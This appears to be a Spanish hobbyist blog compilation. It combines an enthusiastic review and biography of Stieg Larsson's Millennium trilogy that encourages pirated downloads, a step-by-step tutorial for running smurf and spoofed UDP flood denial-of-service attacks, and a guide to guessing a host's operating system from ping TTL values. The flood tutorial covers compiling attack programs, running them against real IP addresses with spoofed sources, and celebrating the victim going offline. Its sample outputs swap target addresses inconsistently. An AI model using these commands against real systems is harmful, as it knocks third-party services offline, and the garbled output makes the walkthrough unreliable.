Millennium

 


            Stieg Larsson            
Millenniumtrilogin.
 
By: FreeInfo


Stieg Larsson, ¿Os suena este nombre?...
…Seguramente si, en caso contrario no os preocupe, pues se me ha ocurrido escribir hoy unas líneas sobre este interesante escritor sueco. Mejor dicho, sobre su obra, la trilogía Millennium.
Antes que nada, quiero decir que, si os sentís incómodos con mis alabeos a este genio, tampoco os preocupéis mucho, pues los motivos de tal inclinación haciá Larsson están muy bien justificados.  1ª Es un genio. 2ª Ha escrito una de las mejores novelas que he leído en mi vida.  3ª Su obra fue la novela policiaca  más leída en Suecia, Reino Unido, Francia, Italia, España, y sigue en aumento. 4ª Ha vendido más de un millón  de copias en formato digital. Sin contar con la piratería, los libros en castellano han estado en todas y cada una de las páginas web de libros underground de habla hispana, recibiendo más de tres millones de descargas ilegales (aproximadamente). 5ª El señor Larsson Está en contra del machismo y el maltrato a las mujeres, bueno, es un feminista convencido. 6ª Fue un miembro impulsor en las protestas contra la Guerra de Vietnam.
Yo seguiría añadiendo motivos para adorarle como a un genio más, pero si leéis un poco su biografía y leéis su trilogía, os daréis cuenta del porque de los motivos.
Después de entender esto, seguramente penséis: “Vale, muy bien, un genio. Pero ¿Qué hace la literatura en tu blog?
La respuesta es muy fácil.  El personaje principal “Lisbeth Salander”, es una chica HACKER, SOLITARIA, ANTISOCIAL, INTELIGENTE y tiene un don: MEMORIA FOTOGENICA.
Ósea que solo se diferencia de mi en que es inteligente, xD.

Biografía.

Karl Stig-Erland Larsson nasció el 15 de agosto de 1954 en Skelleftehamn, provincia de Västerbotten, Suecia.. Allí creció hasta sus 8 años de edad junto a sus abuelos, momento en el que se vio obligado a vivir con sus padres en el pueblo de Umea a 100km, debido al fallecimiento de ambos.
En su adolescencia padecía del trastorno de sueño. En términos más precisos, lo llamamos insomnio. Con lo que dedicaba noches enteras a redactar en una máquina de escribir que le regalaron a los 12 años. Su familia hablo de él sobre esta época como alguien a quien no le dejaba dormir en paz, así que le mandaban que fuera a dormir en el garaje. Stieg no les reprocha por ello, es más el decía que, aquello era una oportunidad, pues tenía algo que hacer por las noches mientras no podía dormir.
Con 14 años, mientras acampaba con sus amigos, fue cómplice o testigo de cómo ellos violaban a una chica; días después se cruzó con esta chica por la calle y se acercó a pedirle perdón por lo que habían hecho anteriormente y por no haberlo evitado; Esta chica jamás le perdono. Larsson desde entonces y hasta el día de su muerte se sintió culpable por ello, esto lo marco mucho y es posible que se haya convertido en feminista convencido debido a este caso en concreto.
Más tarde, trabajó lavando platos en distintos restaurantes de la ciudad. Viajó dos veces  a África con el dinero de sus ahorros. Entre 1977 y 1999 trabajó como diseñador gráfico para la agencia de noticias Tidningarnas Telegrambyrå.
Militó en la Liga Comunista de Trabajadores de su país. Se comprometió a fondo en la lucha contra el racismo y la ultraderecha antidemocrática, participó a mediados de los 80s  en la fundación del famoso proyecto anti violencia “Stop the Racism”. En 1995 fue uno de los promotores de la Fundación Expo, dedicada a "estudiar y cartografiar las tendencias antidemocráticas, de extrema derecha y racistas en la sociedad".
Su  revista fue fundada en 1995, justo cuando siete personas fueron asesinadas por unos neo-nazis. En 1998, por el escaso apoyo de la sociedad, y el desinterés del govierno de su país la revista se vino abajo. Se reorganizaron con una nueva gestión en 2001. Escribió varios libros de investigación periodística acerca de los grupos nazis de su país y de las conexiones entre la extrema derecha y el poder político y financiero. Amenazado por la ultraderecha, el miedo no le permitió casarse con su pareja Eva Gabrielsson, pues él no quería que su nombre constara en ninguna clase de registros oficiales. Este miedo no solamente se basaba en amenazas sino en hechos que desgraciadamente ha presenciado. Uno de estos hechos fue la muerte de su amigo y compañero de trabajo, le asesinaron con un coche-bomba, al puro estilo de Hollywood.
Stieg era muy trabajador, aunque era fumador compulsivo, excesivo mejor dicho (consumía de entre tres y 4 paquetes de tabaco al día). Bebedor asiduo de café. Se quejaba mucho por el insomnio. Además era amante de la comida basura. Con lo que su corazón no aguanto mucho y falleció de un infarto cuando, averiado el ascensor, subía a su pequeña casa de cincuenta metros cuadrados, situada en un quinto piso.
Con la muerte de Larsson en noviembre de 2004 dejó tres novelas inéditas que se agruparon en la trilogía MILLENNIUM. Semanas después su viuda pareja afirma, que Larsson ya había empezado a escribir la 4ª entrega días antes de morir.
La trilogía pronto se convirtió en todo un bestseller póstumo en Europa, lo que intente resumir rápidamente durante el prologo de este articulo.[]

Bibliografía.

  • Män som hatar kvinnor (2005). Publicada en castellano con el título: Los hombres que no amaban a las mujeres. Barcelona: Destino, 2008. ISBN 978-84-233-4044-6
  • Flickan som lekte med elden (2006). Publicada en castellano con el título: La chica que soñaba con una cerilla y un bidón de gasolina. Barcelona: Destino, 2008. ISBN 978-84-233-4100-9.
  • Luftslottet som sprängdes (2007). Publicada en castellano con el título: La reina en el palacio de las corrientes de aire. Barcelona: Destino, 18 junio 2009. ISBN 978-84-233-4161-0.

Libro 1. 
 

Introducción.
Esta entrega forma parte de la trilogía Millenium -es el primero de los tres libros.
Män som hatar kvinnor, en español  “Los hombres que no amaban a las mujeres”. En una traducción más correcta “Hombres que odian mujeres”. En España, el título fue traducido de la edición francesa aunque el libro en si fue traducido directamente del sueco y lo publicaron en Junio del 2008 la editorial Destino.
Es una novela bastante negra, que, se sitúa en un complicado fraude financiero internacional y el pasado mal enterrado de una rica familia industrial sueca a lo largo del siglo XX.
A través de su personaje principal, se refiere al clásico ambiente del género de suspense y crimen, también sigue y mezcla los aspectos de otros subgéneros. Hay menciones de Enid Blyton, Agata Christie y Dorothy L. Sayers; así como Sue Grafton, Val McDermid, Sara Paretsky y varias figuras clave en la historia de la novela policíaca.
Las ciudades mencionadas son reales, a excepción de Hedestad/Hedeby.
 

Argumentación.

Henrik Vanger, ex-director de la Corporación Vanger, una de las empresas más importantes de Suecia, le propone un trato a Mikael Blomkvist, co-director de la revista millennium, en el cual Mikael debe escribir un libro sobre su imperio y su extensa familia y, a la vez, investigar la desaparición en 1966 de la sobrina de Vanger, Harriet, que ha desaparecido durante una reunión familiar  y ha sido dada por muerta. Mikael accede, porque Vanger le ofrece información reveladora sobre Wenneström, el empresario por el cual Mikael fue sentenciado por difamarle, y relegado de su papel como co-director de la revista Millennium.
En  el pequeño pueblo de Hedestad, al norte de Suecia y principal residencia de la familia Vanger, Mikael conocerá a varios miembros de la familia y consigo varias causas de disputas graves y sospechosas: el reparto de las acciones de la compañía entre muchos socios minoritarios que son todos parientes; el pasado nazi de varios de sus miembros; y la clave del misterio en torno a Harriet Vanger por supuesto.
Por otro lado esta un Hacker, Lisbeth Salander, de sexo femenino. Una chica poco común, muy inteligente, fóbica socialmente hablando y con tendencias antisociales. -Dicen que es fea y aburrida, pero su aspecto me atrae mucho asique no puedo opinar-. Lisbeth ha sido contratado por Wennerström y los suyos, para que penetrara en los ordenadores personales de Mikael y robara toda la información que pudiera sobre Mikael. Algo que ni está bien hacer, ni tampoco es legal, aunque ella lo sabe. Hace el trabajo lo mejor que pudo, entrega la información y se pone a hacer algo distinto. Pero al llegar a casa siente curiosidad por el periodista Mikael, con lo que no duda en hacer su propia investigación sobre Mikael. Algo muy común en los hackers es estudiarse la vida de las personas, como si eso importara, o fuere a aprender algo nuevo…
… Ente los documentos de Mikael, Lisbeth encuentra el contrato propuesto por la familia Vanger, y en ella crece un interés profundo sobre el caso. Pasan los días, de contraseñas crackeadas, de búsquedas en google, etc, etc. Lisbeth va enterándose poco a poco. Hasta que Mikael se da cuenta de que alguien había lanzado ataques a su ordenador personal, y le habían robado información confidencial suya. La encuentra sin muchas dificultades, pues Henrik estaba al tanto de todo aquella pelea entre la revista Millennim y Wenneström.
Mikael no denuncia a Lisbeth, en cambio la contrata para que le ayude con el caso de la familia Vanger. Lisbeth lo acepta, pues no le queda otra, o esto o ir a la cárcel, pues no era lo único malo que ha hecho ella, sino que ha tenido un pasado más oscuro aun.
Y así da comienzo la investigación de verdad.

Libro 2.
 



Introducción.
Esta entrega forma parte de la trilogía Millenium -es el segundo de  tres libros.
La chica que soñaba con una cerilla y un bidón de gasolina. No bromeo, el titulo es este sin más preámbulos. Largo pero inolvidable. Es la traducción al español de “Flickan som lekte med elden” original, sueco. Literalmente hablando vendría a ser  "La niña que jugó con fuego"-Me gusta más lo correcto.
En la obra, Larsson vuelve a adentrarse en el mundo de Los hombres que no amaban a las mujeres de la mano del periodista Mikael Blomkvist y la hacker Lisbeth Salander que a lo largo de una sórdida trama de corrupción moral y asesinatos que, además de indagar en el terrible pasado de Salander, pone en miope  el funcionamiento, supuestamente perfecto, de la sociedad sueca, también en sus facetas política, institucional y policial. Otra novela bastante negra, aunque en esta ocasión, el argumento se centra en el tráfico de personas con fines de explotación sexual.

Argumentación.
Tras un año viajando por el extranjero con el dinero de Wennerström, Lisbeth volverá a Suecia para retomar su vida, esta vez apartada de Mikael y de las pocas personas que la conocen. Al mismo tiempo, Mikael y el resto de la revista Millennium tendrá que ayudar a un hombre llamado Dag Svensson a publicar un libro en el que lleva 4 años trabajando y que denuncia los abusos de policías, reporteros y contrabandistas hacia las prostitutas traídas ilegalmente desde otros países.
En el anterior libro hemos podido leer un capitulo en el cual Lisbeth le tatuó en el pecho "Soy un cerdo sádico, un hijo de puta y un violador" de un abogado que la había violado un par de veces. En esta segunda novela el abogado, alcoholizado y sucio, violador, miembro del club de tiro de la policía, Greenpeace y Amnistía Internacional;  Bjurman, reaparece de nuevo en este libro para intentar vengarse de la humillación que le impuso Salander. Veremos también a un Mikael buscando como loco a la "dominante, inteligente, audaz, seductora, fetichista, perversa…” Lisbeth Salander, como si de enamorado se tratara.
Conoceremos también al padre de Lisbeth, veremos cómo le prendió fuego  siendo aun una niña, harta de ver como este maltrataba a su madre.

Libro 3.
 



Introducción.
Esta entrega forma parte de la trilogía Millenium -es el ultimo de los tres libros.
La reina en el palacio de las corrientes de aire (traducción al español de Luftslottet som sprängdes, traducción literal “El castillo de aire que fue hecho estallar). La tercera y última de la Trilogía Millennium ("Millenniumtrilogin").
En España, este tercer volumen fue publicado en junio de 2009 y en el primer día se vendieron más de 200.000 ejemplares. Una de las mayores demandas registradas en la jornada inaugural de un lanzamiento de este tipo, según responsables de librerías y cadenas especializadas. -A la altura de Harry Potter, Ken Follet o Carlos Ruiz Zafón.
Larsson utiliza de nuevo a los personajes que ya salieran en Los hombres que no amaban a las mujeres,  Mikael y Lisbeth. Esta tercera entrega es una clara continuación de la segunda.

Argumentación.
Lisbeth Salander planea su venganza contra el hombre que trató de matarla y contra las instituciones gubernamentales que casi destruyeron su vida. Pero no va a ser una campaña directa. Tras recibir una bala en la cabeza, Salander está bajo una férrea supervisión en cuidados intensivos, y se enfrenta a un juicio por tres asesinatos en el momento que le den el alta. Con la ayuda del periodista Mikael Blomkvist y sus investigadores de la revista Millenium, Salander tendrá no sólo que probar su inocencia, también deberá identificar y denunciar a los políticos corruptos que permitieron a los vulnerables convertirse víctimas de abusos y violencia. Antes una víctima, Salander está lista para devolver los golpes.
Tengo que confesar que esta tercera entrega no me gusto mucho el maniqueísmo en el que sumergió la novela. El Juicio final de Lisbeth que estaba previsto desde la primera entrega fue incluso irritante, demasiado fácil,Los malos eran muy malos y tontos y la Buena era muy Buena y muy lista”. Además no podía faltar un par de escenas de acción por parte de Salander en las que de nuevo se muestra rápida y letal. Supongo que he aquí donde reside el secreto de Larsson. Y tengo dos conclusiones que no logro captar. 1ª Larsson realmente se enamoro de su personaje, Lisbeth. Ó 2ª Juega con estas ideas para que las acciones de Lisbeth no tenga consecuencia en la historia. Pese a esto, estaría encantado si hubiere terminado la obra. Me la compraría sin rencor. Y si se hubiere agotado como siempre, me la compraría en formato digital, y si tampoco así, acudiría a la piratería, pero si… seguiría leyendo la saga hasta el final.

Conclusiones finales.
Si aun no ha leído Millennium, no espere más. Cómpratelo, descárgatelo legalmente o no.


D-DOS - FLOOD

Ataques: SMURF y UDP Flood..

   Bueno pues en este tutorial tratare de explicaros de manera fácil, en la que podáis entender todos; como realizar ataques SMURF y UDP Flood.


Antes que nada necesitaremos 3 cositas:
  •    1broadcast.txt (Una lista con centenas o millares de IP´s)  este es un ejemplo de una de esas listas... en la red hay muchas Webs que nos ofrecen listas de IP´s actualizadas, ya sean proxys, http, socks, boadcast, etc..
o

  •    2 - smurf.c (Programilla Exp. para  enviar paquetes ICMP a un host desde diferentes direcciones resultantes).
o

  •    3 - flooder_udp.c (Programilla Flooder. Para enviar cantidades masivas de paquetes UDPa un determinado host).
o

  Una vez bajado todos los archivos, guardalos en un mismo directorio para simplificar el proceso. Por ejemplo en linux: “ /root/ataque/ “ .
Ahora tendremos que compilar los 2 programillas.


Compilando el “smurf.c”(GNU/Linux):

  Desde la consola, con el comando CD accederemos al directorio donde guardamos el archivo smurf.c, por ejemplo:


# cd /root/ataque
#


  En “ ataque “ deberías poner la carpeta donde guardasteis los 3 archivos.

  Una vez dentro de la carpeta escribiremos en la consola:



# sudo gcc  smurf.c -o smurf
#


  Si lo has echo bien (cosa que no es muy dificil), se abra compilado el smurf. Bien... ahora pasemos a compilar el “ flooder_udp.c “.

 
Compilando el  flooder_udp.c

  El procedimiento es el mismo; me imagino que seguireis en la misma consola metido en el directorio /root/ataque/. Vale... pues:


# sudo gcc  flooder_udp.c -o  flooder_udp
#




Preparación del ataque smuf

   Para seguir el tutorial necesitaras subirte como ROOT / SUPER-USUARIO. Esto en Linux es fácil:


# sudo su
Password: TU-PASSWORD-ROOT


  vale ya eres ROOT... y aun sigues en el mismo directorio ( /root/ataque/ ). ahora ejecutaremos el “smurf”:


# ./smurf
usage: ./smurf <target> <bcast file> <num packets>
<packet delay> <packet size>


   bueno pues este sera el comando que tendreis que ejecutar, os explico detalladamente...


target = IP/Host de la victima.
Bcast file = archivo con las IP´s de broadcast
( /root/ataque/broadcast.txt ).
num packets = numero de paquetes a enviar ( 0 = flood)
packet delay = tiempo de espera entre cada paquete
( en milesimas segundo )
packet size = tamaño del paquete ( <102 )


   El comando que utilizare yo suponiendo que he hecho lo mismo que vosotros sera:

# ./smurf 209.85.229.106 broadcast.txt 0 0 1024


Atacando.

   Ahora le haremos un ping a la victima, para darnos una idea de si esta online... vamos, que si tiene el pc encendido y conectado a la red.
   Os aconsejo cambiar de victima, yo he puesto a  209.85.229.106 (www.google.com), pero no lo hagáis, aparte de que es peligroso, no conseguiréis nada de google :D.


# ping  209.85.229.106
Respuesta desde 209.85.229.106: bytes=32 tiempo=71ms
Respuesta desde 209.85.229.106: bytes=32 tiempo=71ms
Respuesta desde 209.85.229.106: bytes=32 tiempo=70ms
Respuesta desde 209.85.229.106: bytes=32 tiempo=70ms
Estadísticas de ping para 209.85.229.106:
    Paquetes: enviados = 4, recibidos = 4, perdidos = 0
    (0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
3662


  Esto nos demuestra que esta online, que el pc esta encendido y conectado a internet.... entonces ejecutemos el smurf para atacarle:


# ./smurf 209.85.229.106 broadcast.txt 0 0 1024
smurf.c v4.0 by TFreak
Flooding 200.140.161.201 (. = 25 outgoing packets)
…………………………………………………………
……………………………………………....................
…………………………………………………………


  Pasara el tiempo....y le haremos un ping a la victima:


# ping 209.85.229.106

PING 200.140.161.201 (200.140.161.201)
56(84) bytes of data..
Estadísticas de ping para 209.85.229.106
Paquetes: enviados = 5, recibidos = 0, perdidos = 100%
Tiempos aproximados de ida y vuelta en milisegundos:
3569ms


  Vale ::D, esto nos dice que la victima esta OFF,  le as tirado o ha se  ha desconectado el solo. :D felicidades.


Ahora utilizaremos el flooder

  ejecuten el flooder_udp:


# ./udp_flooder
[=] + ===========[####]============ + [=]
*** Emperial Flooder[UDP] ***
XxX VIPER CORP GROUP XxX
<-> Underground Max <->
[=] + ==========[####]============ + [=]
usage: ./flooder_udp <IP_Spoof> <Victima>
<Puerto_origen> <puerto_Destino> <msg> <num_msgs>


     El comando que utilizare yo sera:

./flooder_udp 78.128.144.44 200.140.161.201 8090 DDDDDDDDDDDDDDDD 1000000

  Un consejo: para que tengáis buenos resultados es necesario ejecutar este comando varias veces consecutivas.

   Vamos a hacerle ping a la victima:


# ping 200.140.161.201
Respuesta desde 209.85.229.106: bytes=32 tiempo=71ms
Respuesta desde 209.85.229.106: bytes=32 tiempo=71ms
Respuesta desde 209.85.229.106: bytes=32 tiempo=70ms
Respuesta desde 209.85.229.106: bytes=32 tiempo=70ms
Estadísticas de ping para 209.85.229.106:
    Paquetes: enviados = 4, recibidos = 4, perdidos = 0
    (0% perdidos),
Tiempos aproximados de ida y vuelta en mili segundos:
3662ms


  Como vemos la victima sigue en pie, ON. Pues le atacamos:


# ./flooder_udp 78.128.144.44 200.140.161.201
8090 DDDDDDDDDDDDDDDDDDDD 1000000
--Estadística del ataque--
Total de bytes enviados: [31000000]
---------------------------------------------


    Ejecutaremos el mismo comando varias veces consecutivas, hasta que te canses por ejemplo. Siempre puedes hacer un script para que te ejecute este comando varias veces mientras duermes.
  Cuando te ayas cansado vuelve a hacerle un ping a la victima:


# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201)
56(84) bytes of data.
Estadísticas de ping para 209.85.229.106:
Paquetes: enviados = 15, recibidos = 0,
perdidos = 100%
Tiempos aproximados de ida y vuelta
en mili segundos:
15222ms


  :D Ya esta, la respuesta del Ping nos dice que esta OFF, vamos que le as tirado la conexión :D.
 
Saludos.

PING


Sacando-le provecho al PING.

antes que nada... ¿que es el comando PING? y ¿para que sirve?

  El comando PING, normalmente se utiliza para determinar si una maquina se encuentra conectada a Internet o alguna otra red. Este comando puede funcionar bajo la mayoría de sistemas operativos (S.O), independientemente de la plataforma. Lo que hace es: enviar una cantidad de paquetes (denominando ICMP), haciendo que el equipo receptor nos responda con paquetes ICMP también.

  Osea que si tenemos la dirección IP/host de algún equipo conectado a la red, podremos saber en cualquier momento si este se encuentra conectado o no.

Veamos un ejemplo... una imagen vale mas que mil palabras:

Pues esta Ventana Negra se llama Shell/consola como quieras llamarle. Bueno pues ahora pasaremos a ejecutar el comando PING.
en la ventana negra escribir lo siguiente:
ping ip/host

por ejemplo, yo quiero saber si elhacker.net esta online... pues el comando seria:
ping elhacker.net

Entonces PING nos respondería con algo parecido a esto:


Lo dice muy claramente, y en español:

Envía los paquetes ICMP con 32 bytes de datos a elhacker.net que corresponde a la ip [66.118.151.58].
En total envía 4 paquetes, y elhacker.net nos respondió bien... con todos los datos. La lógica nos dice que el equipo donde esta alojado el servidor de elhacker.net se encuentra encendido y conectado a la red.

En el caso de que no sea así y el equipo este apagado o no se encuentre conectado a ninguna red nos respondería de la siguiente manera:


Ahora cambia la cosa... y también nos lo dice muy bien y en español, repasemos-lo:

Envía los paquetes ICMP con 32 bytes de datos a la dirección IP 192.73.22.4.
Solamente envía 4 paquetes, y la dirección 192.73.22.4 no nos responde a ninguna.
Está mas que claro que el equipo al que pertenece esta dirección no esta conectado a Internet o alguna red con la tuya. O simplemente este apagado... o puede que esa dirección no pertenezca a ningún equipo de la red.

Podemos notar que ademas de decirnos si el equipo se encuentra On o OFF, el comando ping también puede verificar la dirección IP de un dominio, como es el ejemplo de la figura 2. Haciendo ping a elhacker.net nos respondió con la dirección 66.118.151.58. Pues esa es  la dirección que corresponde a elhacker.net, seguramente sea de alguna empresa de hosting.

No acaba aquí. El comando ping entre otras cosas, también nos dice el sistema operativo que corresponde a una dirección IP/HOST... ¿que? ¿no lo encontráis? :)
Es bien fácil, guardaros esta tabla:

--------------------------------------------
Free/Net/OpenBsd--------------------TTL 255
Linux-------------------------------TTL 255
Windows(95/98/Nt/2000/XP/2003/Vista)TTL 128
Roteadores(Bay/Cyclades)------------TTL  30
Roteadores (Cisco)------------------TTL 255
Switches (3 com)--------------------TTL  30
Impressoras HP (JetDirect/LaserJet/)TTL  60
--------------------------------------------

:D ahora volved a fijaros en la imagen que hicimos del ping en elhacker.net:


A-veis visto? :D el TTL nos indica el S.O
pues fijaros ahora que los TLL de elhacker.net no corresponde a ninguno de nuestra tabla... nos responde con el valor de 251. y no creo que tengan un S.O distinto a algún de esta tabla.
Esto pasa, porque cuando haces el PING a un ordenador de la red, cada vez que este pasa por un segmento de la red (Router o Gateway) el mismo le resta un TTL siendo así (-1 TTL por cada segmieno de red), y asi sucessivamente hasta el destino, nosotros.
Para saber el valor real del TLL, necesitamos saber por cuantos segmentos a pasado antes de llegarnos la respuesta. Tenemos otro comando muy útil para esto, en WINDOWS es “tracert” y en Linux es “traceroute”, veamos como ejecutarlo en WINDOWS:


Como ya lo podéis ver... Seleccionado en rojo es la ruta que traza para llegar hasta elhacker.net
cada linea corresponde a un router o gateway.
Seleccionado en verde el numero 4, corresponde a cuantos segmentos se han echo. Osea que mi ping paso por 4 segmentos diferentes. Con esto solo tenemos que sumar los 251 TTL + 4 de los routeadores que hemos trazado hasta elhacker.net. Nos dara la cantidad exacta de = 255. mirando en la tabla, vemos que no corresponde a WINDOWS :D

--------------------------------------
Free/Net/OpenBsd--------------TTL 255
Linux-------------------------TTL 255
Roteadores (Cisco)------------TTL 255
--------------------------------------

Ya sabemos que seguramente sea un Linux o un OpenBsd.:) Se que hay maneras mas fáciles y sencillas de descubrir el S.O de una dirección IP... pero esta bien aprende algo siempre... algún día no tendrás nada a mano y esto te servirá.


Saludos.